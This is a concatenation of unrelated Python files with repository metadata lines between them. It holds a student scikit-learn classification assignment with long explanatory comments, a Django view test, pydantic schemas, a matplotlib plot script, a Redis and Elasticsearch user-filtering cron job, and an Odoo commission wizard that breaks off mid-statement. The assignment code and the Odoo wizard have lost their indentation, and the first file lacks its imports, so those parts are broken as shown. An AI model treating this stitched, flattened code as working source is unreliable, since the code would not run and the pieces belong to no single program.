from assignments.assignment1.c_data_cleaning import fix_nans
from assignments.assignment1.d_data_encoding import generate_label_encoder, replace_with_label_encoder, \
generate_one_hot_encoder, replace_with_one_hot_encoder, fix_outliers, fix_nans, normalize_column
from assignments.assignment1.e_experimentation import process_iris_dataset, process_amazon_video_game_dataset_again, \
process_life_expectancy_dataset
"""
Classification is a supervised form of machine learning. It uses labeled data, i.e. data for which the expected
result is available, to train a machine learning model to predict that result. Classification
focuses on results of the categorical type.
"""
'''
NOTE: I added some print statements to help inspect the functions' output during testing.
I commented them out as they cause quite a lot of clutter for the larger functions,
BUT feel free to comment any of the print statements back in while testing if it helps :)
'''
##############################################
# Example(s). Read the comments in the following method(s)
##############################################
def simple_random_forest_classifier(X: pd.DataFrame, y: pd.Series, set: str = None) -> Dict:
"""
Simple method to create and train a random forest classifier
https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html
"""
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)
# If necessary, change the n_estimators, max_depth and max_leaf_nodes in the below method to accelerate the model training,
# but don't forget to comment why you did and any consequences of setting them!
if set == 'Amazon':
model = RandomForestClassifier(n_estimators=5)
else:
model = RandomForestClassifier()
model.fit(X_train, y_train)
y_predict = model.predict(X_test) # Use this line to get the prediction from the model
accuracy = model.score(X_test, y_test)
return dict(model=model, accuracy=accuracy, test_prediction=y_predict)
def simple_random_forest_on_iris() -> Dict:
"""
Here I will run a classification on the iris dataset with random forest
"""
df = pd.read_csv(Path('..', '..', 'iris.csv'))
X, y = df.iloc[:, :4], df.iloc[:, 4]
le = LabelEncoder()
y_encoded = le.fit_transform(y)
rf = simple_random_forest_classifier(X, y_encoded)
print(rf['accuracy'])
return rf
def reusing_code_random_forest_on_iris() -> Dict:
"""
Again I will run a classification on the iris dataset, but reusing
the existing code from assignment1. Use this to check how different the results are (score and
predictions).
"""
df = read_dataset(Path('..', '..', 'iris.csv'))
for c in list(df.columns):
# Notice that I am now passing through all columns.
# If your code does not handle normalizing categorical columns, do so now (just return the unchanged column)
df = fix_outliers(df, c)
df = fix_nans(df, c)
df[c] = normalize_column(df[c])
X, y = df.iloc[:, :4], df.iloc[:, 4]
le = generate_label_encoder(y)
# Be careful to return a copy of the input with the changes, instead of changing inplace the inputs here!
y_encoded = replace_with_label_encoder(y.to_frame(), column='species', le=le)
rf = simple_random_forest_classifier(X, y_encoded['species'])
'''
!!Explanation!!
Both the classifier in this function and the one in the previous function yield just about the same score on average.
I believe this is because the two datasets are essentially the same at this point: they both have label-encoded classes.
The only differences are that this function removes NaNs and outliers, which the dataset does not possess many of anyway,
and also normalizes the dataset, which to my understanding might not actually change the values
in relation to other values. This normalization may just make the model in this function more efficient!
Due to this potential boost in efficiency from normalization, I would choose this function's model over the previous one.
'''
print(rf['accuracy'])
return rf
##############################################
# Implement all the below methods
# Don't install any other python package other than provided by python or in requirements.txt
##############################################
def random_forest_iris_dataset_again() -> Dict:
"""
Run the result of the process iris again task of e_experimentation and discuss (1 sentence)
the differences from the above results. Use the same random forest method.
Feel free to change your e_experimentation code (changes there will not be considered for grading
purposes) to optimise the model (e.g. score, parameters, etc).
"""
df = process_iris_dataset()
X, y = df.iloc[:, :5], df.iloc[:, 5:]
rf = simple_random_forest_classifier(X, y)
'''
!!!Explanation!!!
There are not too many differences present, as the datasets are the same.
The datasets are quite balanced, and the train and test are properly split so we can rule out model
over fitting for the most part.
Although the labels are encoded in different ways, their meanings are not changed between models.
The only notable difference is that the process_iris_dataset() classifier has a slightly lower score on average.
I believe this is because the process_iris_dataset() has an additional numeric mean column.
This may provide extra noise to the dataset, which results in the classifier being slightly worse!
I think this adds noise as the mean of each column doesn't really provide any new information that may benefit
this specific classification task.
To combat this, I believe running some feature selection and descriptive analysis on the dataset, and
dropping a few of the less relevant columns, may improve the model.
A feature selection method that may prove useful here is the pandas correlation function corr(), to find the
strength of the correlation between each feature and the target label (a commented sketch follows below).
'''
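# A minimal sketch of the corr()-based feature selection mentioned above (illustrative only;
# it assumes the columns of X are numeric and that y holds the encoded target):
#   feature_scores = X.corrwith(y.squeeze()).abs().sort_values(ascending=False)
#   print(feature_scores)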
print(rf['accuracy'])
return rf
def decision_tree_classifier(X: pd.DataFrame, y: pd.Series) -> Dict:
"""
Reimplement the method "simple_random_forest_classifier" but using the technique we saw in class: decision trees
(you can use sklearn to help you).
Optional: also optimise the parameters of the model to maximise accuracy
:param X: Input dataframe
:param y: Label data
:return: model, accuracy and prediction of the test set
"""
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.30)
# max_features = 1
# max_depth = 2
# max_leaf_nodes = 2
model = DecisionTreeClassifier()
model.fit(X_train, y_train)
y_predict = model.predict(X_test) # Use this line to get the prediction from the model
accuracy = model.score(X_test, y_test)
return dict(model=model, accuracy=accuracy, test_prediction=y_predict)
def train_iris_dataset_again() -> Dict:
"""
Run the result of the iris dataset again task of e_experimentation using the
decision_tree classifier AND random_forest classifier. Return the one with highest score.
Discuss (1 sentence) what you found different between the two models and scores.
Feel free to change your e_experimentation code (changes there will not be considered for grading
purposes) to optimise the model (e.g. score, parameters, etc).
"""
df = process_iris_dataset()
X, y = df.iloc[:, :5], df.iloc[:, 5:]
rf = simple_random_forest_classifier(X, y)
dt = decision_tree_classifier(X, y)
print(rf)
print(dt)
'''
!!!Explanation!!!
I may be inclined to choose the decision tree here (in this specific case) over the random forest.
Random forests are typically known to be more accurate because they take the average of many
decision trees rather than just one, but that also makes a single decision tree more efficient in time and space,
as it requires only one tree instead of many.
In this specific instance, it seems that on average the decision tree is just as accurate as the random forest.
I believe this is due to the data set being both balanced and easily separable.
Therefore I will take the decision tree over the random forest,
as the decision tree yields around the same accuracy on average AND is more efficient.
This is just for this specific function though; I think overall random forests are usually the way to go,
even if they require more time and resources to execute, as they solve a lot of the accuracy issues decision
trees may have, such as overfitting.
'''
if rf['accuracy'] > dt['accuracy']:
print('random forest wins')
return rf
else:
print('decision tree wins')
return dt
def train_amazon_video_game_again() -> Dict:
"""
Run the result of the amazon dataset again task of e_experimentation using the
decision tree classifier AND random_forest classifier. Return the one with highest score.
The Label column is the user column. Choose what you wish to do with the time column (drop, convert, etc)
Discuss (1 sentence) what you found different between the results.
In one sentence, why is the score worse than the iris score (or why is it not worse) in your opinion?
Feel free to change your e_experimentation code (changes there will not be considered for grading
purposes) to optimise the model (e.g. score, parameters, etc).
"""
df = process_amazon_video_game_dataset_again()
'''
!!!Explanation!!!
This is the most significant preprocessing action I take:
I have decided to remove all rows whose labels appear fewer than 10 times in the dataset.
I find this solves many of the issues I was having with this data set.
1. In classification, the model must train itself using the available labels in the training set, and then tests its
performance predicting those labels with the testing set. I found as there are many unique instances in this dataset
the model would evaluate instances that had labels which the model had not even seen before. This is problematic as
the model would essentially make a guess at the instance, and because it did not know the correct label, it would
always get it wrong. To fix the data set, it may be good to collect some data to help inflate those unique instances
and thus balance the dataset, or to somehow generalize the labels so they are not so specific that there
are single instances with a unique label.
2. This also significantly reduces the size of the data set, which allows the model to run efficiently without
sacrifices to the Decision Tree or Random Forest models. The data set is reduced to nearly half of what it used to
be when you remove unique instances, and even more when you only look at labels that appear at least 10 times.
'''
df = df.drop(df[df['user_count'] < 10].index)
print(df)
X, y = df.iloc[:, 1:], df.iloc[:, :1]
'''
!!!Explanation!!!
I decided to drop the time column as I personally don't think it will have a correlation with the target labels.
The time only seems to indicate the activity of the user, which is easily updated once the user reviews again.
Thus, my theory is that the model might learn to check when a user is active, which could overfit the model if user
activity is somewhat random.
For example, if they reviewed a video game that came out today, after not reviewing one after 10 years,
the model may not predict the user because it is biased to the activity dates.
Sometimes sequels to games come out after a long, long time as any video game fan knows, and perhaps a player might
want to review the newest sequel of a game series they used to like to review.
I believe the model should be able to predict the user from other features relating to the user's rating behaviours,
but it should be independent of time, as there are no set rules for when a user might review.
'''
X = X.drop(['time'], axis=1)
'''
!!!Explanation!!!
I decided to label encode the 'asin' data column. I believe this may be important to the models classification as
there may be some sort of pattern between the user and the types of video games they review.
For example, maybe user John only reviews Halo games, and never Call of Duty games.
As this data type is a string, I needed some way to encode it. My first thought was one hot encoding but there are
many different 'asin' attributes, so to one hot encode that we would need to use A LOT of bits. Thus one hot
encoding seemed inefficient for space, thus label encoding these values seemed to be the next best option, as to the
model the newly allocated numeric names to the 'asin' data will not change its meaning if patterns are present.
'''
le = LabelEncoder()
X['asin'] = le.fit_transform(X['asin'])
# this is here to convert shape to (n,) to prevent future warnings
y = y.values.ravel()
le = LabelEncoder()
y_encoded = le.fit_transform(y)
'''
!!!Explanation!!!
I used a different random forest configuration compared to the others I've been using.
The default number of estimators (trees in the forest) is 100 according to the scikit-learn documentation.
If I execute my code with that many estimators, my computer runs out of memory and the program crashes,
so after playing around with this hyperparameter of the random forest, I settled on 5 estimators. Once again, I'm
sure the ideal number of estimators is higher, but due to memory limitations I am using 5 estimators.
'''
rf = simple_random_forest_classifier(X, y_encoded, 'Amazon')
print(rf)
dt = decision_tree_classifier(X, y_encoded)
print(dt)
'''
!!!Results!!!
The decision tree is returning around a .5 accuracy score.
The random forest classifier is returning around the same accuracy score on average.
This specific function takes a long time to run as there is a ton of data to be processed, even with the
preprocessing.
I think there is room for overfitting here due to the duplicate values in the data set.
This is an issue because these values may be ending up in both the training and the testing set, leading to a bias
for that one set. It is difficult to compensate for these duplicates with the data we have, so I believe a solution
to this may be to collect some more data relating to each specific row, perhaps more information relating to the
users specific review for each review. These features may include some traits coming from the field of NLP, such as
semantic and sentiment analysis. Perhaps the model would be able to pick up on some patterns relating to how the
user writes, while also not being biased towards specific labels due to data duplication.
'''
if rf['accuracy'] > dt['accuracy']:
print('random forest wins!')
return rf
else:
print('decision tree wins!')
return dt
def train_life_expectancy() -> Dict:
"""
Do the same as the previous task with the result of the life expectancy task of e_experimentation.
The label column is the column which has north/south. Remember to convert drop columns you think are useless for
the machine learning (say why you think so) and convert the remaining categorical columns with one_hot_encoding.
(check the c_regression examples to see example on how to do this one hot encoding)
Feel free to change your e_experimentation code (changes there will not be considered for grading
purposes) to optimise the model (e.g. score, parameters, etc).
"""
df = process_life_expectancy_dataset()
'''
!!!Explanation!!!
I dropped the year column as it contains many NaN values.
It is not really a value you can fix by simply averaging the non-empty entries;
logically that would not make sense, and I believe doing so would misrepresent the year column.
I do not expect this to affect accuracy all that much, as the year should not have that big of an impact on the
classification of the country being in the north or south, which is what this function is doing.
'''
df = df.drop(['year'], axis=1)
'''
!!!Explanation!!!
The expectancy column also has a lot of Nan values, so I decided to replace those Nans with the average of that
column. I believe this is appropriate as the life expectancy is probably around the same range for each country in
this dataset, so taking the average of it is a good measure of the life expectancy for any country.
Note: This hypothesis may not be great as the range of expectancy is quite large, from my preprocessing it will be
around 75 years; but given that some countries are developing, as well as the data being from many years ago,
for now I believe the mean can still give a better representation than nothing!
'''
mean = get_column_mean(df, 'expectancy')
df['expectancy'].fillna(value=mean, inplace=True)
X = df
X = X.drop(['latitude'], axis=1)
y = df['latitude']
print(X)
print(y)
'''
!!! Explanation !!!
I decided to label encode the country name.
I could not leave the names as strings, as the model would not be able to read them, and I think one-hot encoding
the names would be very space-inefficient: there are many different country names, and we would need a lot of bits to
one-hot encode them all!
'''
le = generate_label_encoder(X['name'])
X['name'] = le.fit_transform(X['name'])
rf = simple_random_forest_classifier(X, y)
dt = decision_tree_classifier(X, y)
'''
!!!Explanation!!!
Both the decision tree and the random forest are performing very well, both with ~.99 accuracy scores.
From the results, both performed much better than any function we have classified before.
I am inclined to believe that this data set has led to some overfitting, due to an unbalanced dataset.
The dataset, for example, has the country Afghanistan many times, with each attribute being the same once the year has been
removed and many of the missing expectancy values are set to that column's mean.
This introduces overfitting because the duplicate data instances may go into both the training and testing set:
contamination!! This is not good as the model will be tested on things it already knows, giving it 100% on them
almost automatically... kind of like the model is cheating on a test. Given a completely brand new data set,
I think the model's performance would drop.
Due to this data imbalance, I don't think this dataset is that great to run classification on, even with all of the
preprocessing. I believe a solution to this would be to of course balance out the data set, by collecting more
information about other countries that are less represented in the dataset, as well as add dimensions that are not
so redundant as missing or mean expectancies; perhaps more general features relating to the weather if we are still
trying to predict if it is in the north or south.
'''
if rf['accuracy'] > dt['accuracy']:
print('random forest wins')
return rf
else:
print('decision tree wins')
return dt
def your_choice() -> Dict:
"""
Now choose one of the datasets included in the assignment1 (the raw one, before anything done to them)
and decide for yourself a set of instructions to be done (similar to the e_experimentation tasks).
Specify your goal (e.g. analyse the reviews of the amazon dataset), say what you did to try to achieve the goal
and use one (or both) of the models above to help you answer that. Remember that these models are classification
models, therefore it is useful only for categorical labels.
We will not grade your result itself, but your decision-making and suppositions given the goal you decided.
Use this as a small exercise of what you will do in the project.
"""
'''
!!!My Goal!!!
I will be using the dataset "Geography"
With this dataset, I want to find out if we can fit a model to predict the World Bank Income Group of a country
given a some geographical and bank related features
To find this out, I will preprocess the data in the following ways:
- Fix any missing data in the columns that are mentioned below
- Extract and label encode the World Bank groups column into the labels vector
- Extract and one hot encode World bank region column into the features vector
- Extract latitude into the features vector
- Extract longitude into the features vector
I will train both a Decision Tree and Random Forest to find my goal, and return the model with the greater accuracy
'''
df = pd.read_csv(Path('..', '..', 'geography.csv'))
'''
!!!Explanation!!!
The only columns with Nans for the target features for this were from the Vatican,
so I replaced their null values with the values from Italy.
I know they are technically separate, but until the data set can be filled we will simply consider them the same.
'''
df['World bank region'].fillna(value='Europe & Central Asia', inplace=True)
df['World bank, 4 income groups 2017'].fillna('High Income', inplace=True)
le = generate_label_encoder(df_column=df['World bank, 4 income groups 2017'])
df = replace_with_label_encoder(df=df, column='World bank, 4 income groups 2017', le=le)
ohe = generate_one_hot_encoder(df_column=df['World bank region'])
df = replace_with_one_hot_encoder(df=df, column='World bank region', ohe=ohe,
ohe_column_names=ohe.get_feature_names())
columns = ['Latitude', 'Longitude', 'x0_East Asia & Pacific', 'x0_Europe & Central Asia',
'x0_Latin America & Caribbean', 'x0_Middle East & North Africa', 'x0_North America',
'x0_South Asia', 'x0_Sub-Saharan Africa']
X = df[columns]
y = df['World bank, 4 income groups 2017']
dt = decision_tree_classifier(X=X, y=y)
#print(dt)
rf = simple_random_forest_classifier(X=X, y=y)
#print(rf)
'''
!!!My Results!!!
It seems that once again on average the Decision Tree and Random Forest are yielding similar results.
Their accuracies are quite low, and range from around 50 to nearly 70 percent accuracy.
I don't think a lot of overfitting is occurring here, as the datasets are well balanced, and properly split
into training and testing.
The data set does lack columns that relate to the economy, wealth, or demographics of the country,
so I believe that more data may help the model fit a mapping between the demographic and wealth data of a
given country and its income group (target label).
Features that could be collected as additional data columns could include things such as average income, employment
rate, tax information, and more!
Although this model is just a start, I believe it could be beneficial to companies that are figuring out economic
policies or tax plans. The ability to use this model while trying to come up with plans to benefit a
country's economy could be useful, with enough relevant training and data :)
'''
if rf['accuracy'] > dt['accuracy']:
#print('random forest wins')
return rf
else:
#print('decision tree wins')
return dt
if __name__ == "__main__":
assert simple_random_forest_on_iris() is not None
assert reusing_code_random_forest_on_iris() is not None
assert random_forest_iris_dataset_again() is not None
assert train_iris_dataset_again() is not None
assert train_amazon_video_game_again() is not None
assert train_life_expectancy() is not None
assert your_choice() is not None
authors: ["noreply@github.com"] | author: noreply@github.com
blob_id: cff3e9148fe021dbca2f36fd24270a1aace86027 | directory_id: d9aa525b6a359378572fa7e48bd4fb8529b9ce23 | path: /monitoring/services/tests.py | content_id: 2e6a0fa69ed320fbbe1fcc4f7506227fdb4949ab | detected_licenses: ["Apache-2.0"] | license_type: permissive | repo_name: naanal/monasca-ui | snapshot_id: cb5b7c279836d31809392d5b4572536fbea3634e | revision_id: 37d8926015e35f8949606183469d532924ab58c2 | branch_name: refs/heads/master | visit_date: 2020-02-26T13:04:25.471867 | revision_date: 2016-08-16T05:39:24 | committer_date: 2016-08-16T05:39:24 | github_id: 64,387,546 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: 2016-07-28T10:46:54 | gha_created_at: 2016-07-28T10:46:53 | gha_language: null | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,595 | extension: py | content:
# coding=utf-8
from django.core import urlresolvers
from django.test import RequestFactory
from mock import patch, call # noqa
from monitoring.test import helpers
from monitoring.services import constants
from monitoring.services import views
INDEX_URL = urlresolvers.reverse(
constants.URL_PREFIX + 'index')
class ServicesTest(helpers.TestCase):
    def test_index_get(self):
        res = self.client.get(INDEX_URL)
        self.assertTemplateUsed(
            res, 'monitoring/services/index.html')
        self.assertTemplateUsed(res, 'monitoring/services/monitor.html')
class KibanaProxyViewTest(helpers.TestCase):
    def setUp(self):
        super(KibanaProxyViewTest, self).setUp()
        self.view = views.KibanaProxyView()
        self.request_factory = RequestFactory()
    def test_get_relative_url_with_unicode(self):
        """Tests if it properly converts multibyte characters"""
        import urlparse
        self.view.request = self.request_factory.get(
            '/', data={'a': 1, 'b': 2}
        )
        expected_path = ('/elasticsearch/.kibana/search'
                         '/New-Saved-Search%E3%81%82')
        expected_qs = {'a': ['1'], 'b': ['2']}
        url = self.view.get_relative_url(
            u'/elasticsearch/.kibana/search/New-Saved-Searchあ'
        )
        # order of query params may change
        parsed_url = urlparse.urlparse(url)
        actual_path = parsed_url.path
        actual_qs = urlparse.parse_qs(parsed_url.query)
        self.assertEqual(actual_path, expected_path)
        self.assertEqual(actual_qs, expected_qs)
authors: ["rajagopalx@gmail.com"] | author: rajagopalx@gmail.com
blob_id: 7771948bcd169782ab2c13192c605d49d242b9ed | directory_id: 70bf561fb6b77577eebd3f14500cb457da25bdd2 | path: /backend/api/features/users/schemas.py | content_id: 2ad0cf8983ef8ee9e7401fa479039b75832e4bdb | detected_licenses: ["MIT"] | license_type: permissive | repo_name: mmvo91/recipe-manager | snapshot_id: cdfeb066e5f5343a9fc4aa5b7bcf4b6d815c09e1 | revision_id: 522804f2ef49ddd4bcd9f073a8d0beaf893ed8c0 | branch_name: refs/heads/master | visit_date: 2023-02-05T22:52:46.227482 | revision_date: 2020-12-30T09:37:21 | committer_date: 2020-12-30T09:37:21 | github_id: null | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 311 | extension: py | content:
from api.utils.schema import JSONModel
class UserBase(JSONModel):
    username: str
    email: str
class UserCreate(UserBase):
    password: str
class User(UserBase):
    id: int
    active: bool
    class Config:
        orm_mode = True
class UserLogin(JSONModel):
    username: str
    password: str
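# Illustrative note (not part of the original file): assuming JSONModel behaves like a
# pydantic BaseModel, orm_mode = True on User.Config would let the schema be built straight
# from an ORM object, e.g. User.from_orm(db_user) where db_user is a SQLAlchemy instance.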
authors: ["michaelmvo91@gmail.com"] | author: michaelmvo91@gmail.com
blob_id: fe7d9893fb76b7eb624d74e9a5ceebe38ecee595 | directory_id: 3b0657e8edd9390518e5c14d15878e25683bfe91 | path: /FORTRAN/DMMulti/scripts/param_red.py | content_id: 8bb8fb9ca8fab4363d6ec2e5d5466491a37be1dc | detected_licenses: [] | license_type: no_license | repo_name: lmpizarro/atomistic_simulation | snapshot_id: d3038ff4b1d106662904207099c42b4bccee9f0b | revision_id: d526b1bda6d258e3ab4e4a8619331849b7a0c2bf | branch_name: refs/heads/master | visit_date: 2021-01-10T08:17:00.947930 | revision_date: 2018-11-29T22:06:58 | committer_date: 2018-11-29T22:06:58 | github_id: 46,139,007 | star_events_count: 3 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 827 | extension: py | content:
#!/usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
axis_font = { 'size':'20'}
plt.figure(1,figsize=(8,6))
x = [5.0 ,
5.3 ,
5.5 ,
5.6 ,
5.7 ,
5.8 ,
5.9 ,
5.95,
6.0 ,
6.1 ,
6.2 ,
6.3 ,
6.4 ,
6.5 ,
6.6 ,
6.7 ]
y = [ 16.8 ,
0.388 ,
-4.03 ,
-5.2 ,
-5.92 ,
-6.32 ,
-6.488,
-6.5 ,
-6.483,
-6.37 ,
-6.17 ,
-5.92 ,
-5.54 ,
-5.34 ,
-5.72 ,
-5.59 ]
x = np.asarray(x) / 4.0
y = np.asarray(y)
plt.plot(x,y,'k.',markersize=10)
plt.title(u'Energía potencial a $T^*=0$')
plt.xlabel('$a^*$',**axis_font)
plt.ylabel(u'$U^*$',**axis_font)
plt.ylim(-6.6,-5.1)
plt.xlim(1.35,1.7)
plt.grid(True)
plt.show()
authors: ["pbellino@gmail.com"] | author: pbellino@gmail.com
blob_id: 4c19d1c4ca2143d49702c83bd6fe7486af618b32 | directory_id: 6df4a4cbdaf59009838b2c70b518e66633c67de0 | path: /user_portrait/cron/recommentation_in/filter_rules.py | content_id: c4a58b227bbab39a9fd134e2bd2cc7cfcf24955f | detected_licenses: [] | license_type: no_license | repo_name: jianjian0dandan/user_portrait | snapshot_id: ccf5f43f0aca2d40581faae215fdda1db997a354 | revision_id: 3114ca2fcec23a7039887cca953793ef34cb7f72 | branch_name: refs/heads/master | visit_date: 2021-01-15T19:59:16.286276 | revision_date: 2016-05-18T03:30:37 | committer_date: 2016-05-18T03:30:37 | github_id: 42,869,391 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: 2015-09-21T13:56:51 | gha_created_at: 2015-09-21T13:56:51 | gha_language: null | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 4,731 | extension: py | content:
# -*- coding: UTF-8 -*-
import sys
import csv
import json
import time
reload(sys)
sys.path.append('../../')
from global_utils import R_CLUSTER_FLOW2 as r_cluster
from global_utils import R_DICT, es_retweet, retweet_index_name_pre, retweet_index_type
from time_utils import datetime2ts, ts2datetime
from parameter import DAY
from parameter import RUN_TYPE, RUN_TEST_TIME
from parameter import RECOMMEND_IN_ACTIVITY_THRESHOLD as activity_threshold
from parameter import RECOMMEND_IN_IP_THRESHOLD as ip_threshold
from parameter import RECOMMEND_IN_RETWEET_THRESHOLD as retweet_threshold
from parameter import RECOMMEND_IN_MENTION_THRESHOLD as mention_threshold
from cron.detect.cron_detect import get_db_num
csvfile = open('/home/ubuntu8/huxiaoqian/user_portrait/user_portrait/cron/recommentation_in/filter_uid_list.csv', 'wb')
writer = csv.writer(csvfile)
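# Each filter below keeps only the users that stay under the corresponding threshold
# (weibo activity per day over the last 7 days, distinct IPs, distinct retweeted users,
# distinct mentioned users); users that exceed a threshold are written to
# filter_uid_list.csv together with the rule that filtered them out.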
def filter_activity(user_set):
results = []
#run_type
if RUN_TYPE == 1:
now_date = ts2datetime(time.time())
else:
now_date = RUN_TEST_TIME
ts = datetime2ts(now_date) - DAY
date = ts2datetime(ts)
timestamp = datetime2ts(date)
for user in user_set:
over_count = 0
for i in range(0,7):
ts = timestamp - DAY*i
result = r_cluster.hget('activity_'+str(ts), str(user))
if result:
items_dict = json.loads(result)
for item in items_dict:
weibo_count = items_dict[item]
if weibo_count > activity_threshold:
over_count += 1
if over_count == 0:
results.append(user)
else:
writer.writerow([user, 'activity'])
return results
def filter_ip(user_set):
results = []
#run_type
if RUN_TYPE == 1:
now_date = ts2datetime(time.time())
else:
now_date = RUN_TEST_TIME
ts = datetime2ts(now_date) - DAY
for user in user_set:
ip_set = set()
for i in range(0,7):
timestamp = ts - DAY*i
ip_result = r_cluster.hget('ip_'+str(timestamp), str(user))
if ip_result:
result_dict = json.loads(ip_result)
else:
result_dict = {}
for ip in result_dict:
ip_set.add(ip)
if len(ip_set) < ip_threshold:
results.append(user)
else:
writer.writerow([user, 'ip'])
return results
def filter_retweet_count(user_set):
FILTER_ITER_COUNT = 100
results = []
now_ts = time.time()
db_number = get_db_num(now_ts)
retweet_index_name = retweet_index_name_pre + str(db_number)
# test
search_user_count = len(user_set)
iter_search_count = 0
while iter_search_count < search_user_count:
iter_search_user_list = user_set[iter_search_count:iter_search_count + FILTER_ITER_COUNT]
try:
retweet_result = es_retweet.mget(index = retweet_index_name, doc_type = retweet_index_type,\
body = {'ids':iter_search_user_list}, _source=True)['docs']
except:
retweet_result = []
for retweet_item in retweet_result:
if retweet_item['found']:
retweet_set = set()
user = retweet_item['_id']
per_retweet_result = json.loads(retweet_item['_source']['uid_retweet'])
for retweet_user in per_retweet_result:
retweet_set.add(retweet_user)
if len(retweet_set) < retweet_threshold:
results.append(user)
else:
writer.writerow([user, 'retweet'])
else:
user = retweet_item['_id']
results.append(user)
iter_search_count += FILTER_ITER_COUNT
return results
def filter_mention(user_set):
results = []
#run_type
if RUN_TYPE == 1:
now_date = ts2datetime(time.time())
else:
now_date = RUN_TEST_TIME
timestamp = datetime2ts(now_date) - DAY
date = ts2datetime(timestamp)
for user in user_set:
mention_set = set()
for i in range(0,7):
ts = timestamp - DAY*i
result = r_cluster.hget('at_'+str(ts), str(user))
if result:
item_dict = json.loads(result)
for at_user in item_dict:
mention_set.add(at_user)
at_count = len(mention_set)
if at_count < mention_threshold:
results.append(user)
else:
writer.writerow([user, 'mention'])
return results
authors: ["1257819385@qq.com"] | author: 1257819385@qq.com
blob_id: eb254cada685f3a07b8214c37d6b93437b6240bd | directory_id: cca32ed9fa8ee69550b46b42a689bad6ca03b256 | path: /wizards/generate_commission.py | content_id: f0ff3b468a994e75af5c8d5ee53ffe38c4940392 | detected_licenses: [] | license_type: no_license | repo_name: mohamedabuemira/courier | snapshot_id: 724dba8d4a734046c1085ffad97948869f069f38 | revision_id: d0574b157a1fb62fb0be11a68afa444c1d77dd5f | branch_name: refs/heads/main | visit_date: 2023-09-01T07:03:08.412409 | revision_date: 2021-10-29T23:33:23 | committer_date: 2021-10-29T23:33:23 | github_id: 422,737,366 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 7,685 | extension: py | content:
from odoo import api, fields, models, _
from odoo.exceptions import ValidationError
from datetime import date
class SalesCommissionWizard(models.TransientModel):
_name = 'sales.commission.wizard'
date_from = fields.Date(string='Date From')
date_to = fields.Date(string='Date To')
user_ids = fields.Many2many('hr.employee', string="Sales Drivers",
domain = '[("driver", "=", True)]')
ignore_late_payments = fields.Boolean('Ignore Sales with late payments')
late_payments_exceed = fields.Integer('Late payments exceeds to')
@api.constrains('date_from', 'date_to')
def dates_constrains(self):
for rec in self:
if rec.date_from > rec.date_to:
raise ValidationError('Date To Must Be Greater Than Date From.')
def ignore_unpaid_orders(self, sales_orders):
eligible_sale_orders = self.env['account.move']
for order in sales_orders:
paid_invoices = order.invoice_ids.filtered(lambda x:x.invoice_payment_state == 'paid' and x.type == 'out_invoice')
if paid_invoices:
paid_amount = sum(paid_invoices.mapped('amount_total'))
needs_to_pay = order.amount_total
if paid_amount >= needs_to_pay:
last_paid_invoice_date = max(paid_invoices.mapped('invoice_date'))
if last_paid_invoice_date and last_paid_invoice_date >= self.date_from and last_paid_invoice_date <= self.date_to:
if self.ignore_late_payments:
payment_due_days = (last_paid_invoice_date - order.date_order.date()).days
if payment_due_days >= self.late_payments_exceed:
continue
eligible_sale_orders += order
return eligible_sale_orders
def action_generate_commissions(self):
if not self.user_ids:
self.user_ids = self.env['hr.employee'].search([])
user_id_list = self.user_ids and self.user_ids.ids or []
sales_orders = self.env['account.move'].search([('is_commission_created', '=', False),('driver', 'in', user_id_list)])
sale_orders = sales_orders
user_wise_so = {}
for user in sale_orders.mapped('driver'):
so_of_this_user = sale_orders.filtered(lambda x:x.driver == user)
user_wise_so.update({user:so_of_this_user})
commission_obj = self.env['sale.order.commission']
commission_fix = self.env['fixed.commission.line']
special_comm_line = self.env['special.commission.line']
for user,sale_orders in user_wise_so.items():
re_calculate_sales = False
existing = self.env['sale.order.commission'].search([('salesperson', '=', user.id),('state','=','draft')],
limit=1)
if existing and sale_orders:
re_calculate_sales = existing.mapped('invoice_line_ids')
existing.unlink()
sale_orders = sale_orders + re_calculate_sales if re_calculate_sales else sale_orders
vals = {}
structure_id = user.commission_structure_id
if not structure_id:
continue
order_lines = sale_orders.mapped('invoice_line_ids')
exclude_products = structure_id.exclude_line_ids.mapped('product_id')
special_lines = order_lines.filtered(lambda x: x.product_id in exclude_products)
special_sales = sum(special_lines.mapped('price_subtotal'))
general_lines = order_lines.filtered(lambda x: x.product_id not in exclude_products)
general_sales = sum(general_lines.mapped('price_subtotal'))
net_sales = general_sales + special_sales
if structure_id.deduction_type:
if structure_id.deduction_type == 'fixed':
deduct_sales = general_sales - structure_id.deduction_amount
deduct_amount = str(structure_id.deduction_amount) + '/-'
else:
deduct_sales = (general_sales * structure_id.deduction_amount) / 100
deduct_amount = str(structure_id.deduction_amount) + '%'
            else:
                deduct_sales = net_sales
                deduct_amount = ''  # no deduction configured; keeps the vals dict below well-defined
sale_ids = [(6, 0, sale_orders.ids)]
vals.update({
'commission_structure_id':structure_id.id,
'salesperson':user.id,
'general_amount':general_sales,
'special_amount':special_sales,
'net_amount':net_sales,
'sale_order_ids':sale_ids,
'deduct_amount':deduct_amount
})
for line in structure_id.commission_line_ids:
if general_sales >= line.amount_above and general_sales < line.amount_less_than:
general_cal = str(line.commission_percent) + '%'
general_commission = (deduct_sales * line.commission_percent) / 100
vals.update({
'general_cal':general_cal,
'general_commission':general_commission
})
commission_id = commission_obj.create(vals)
for line in structure_id.fixed_line_ids:
general_fix = str(line.fix_qty) + '%'
commissionfixed =( deduct_sales * line.fix_qty) / 100
fix_vals = {
'sales_commission_id_fixed': commission_id.id,
'general_fixed': general_fix,
'fixed_commission': commissionfixed,
'general_amount_fixed': general_sales,
